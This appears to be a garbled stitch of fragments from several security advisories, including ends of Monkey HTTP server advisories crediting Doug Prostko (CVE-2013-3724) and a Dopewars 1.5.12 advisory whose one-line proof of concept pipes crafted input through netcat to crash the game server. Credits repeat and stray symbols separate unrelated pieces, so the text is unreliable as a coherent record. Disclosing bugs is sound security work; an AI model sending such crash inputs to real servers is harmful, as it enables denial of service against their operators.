The security risk of the DoS vulnerability is estimated
as low.
12. References
http://bugs.monkey-project.com/ticket/181
13. Credits
Doug Prostko dougtko[at]gmail[dot]com
Vulnerability discovery
dougtko[at]gmail[dot]com
Vulnerability discovery
CVE reserved for this bug: CVE-2013-3724
:
=
The security risk of the redirection vulnerability is estimated as low(+).
Credits:
Doug Prostko dougtko[at]gmail[dot]com - Vulnerability discovery
## Description ##
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to
a lack of input validation.
## POC ##
ruby -e 'print foo^^Ar111\n^^Acfoo\n^AV65536\n' | nc localhost 7902
## Fix ##
This issue is resolved in the SVN version of the application.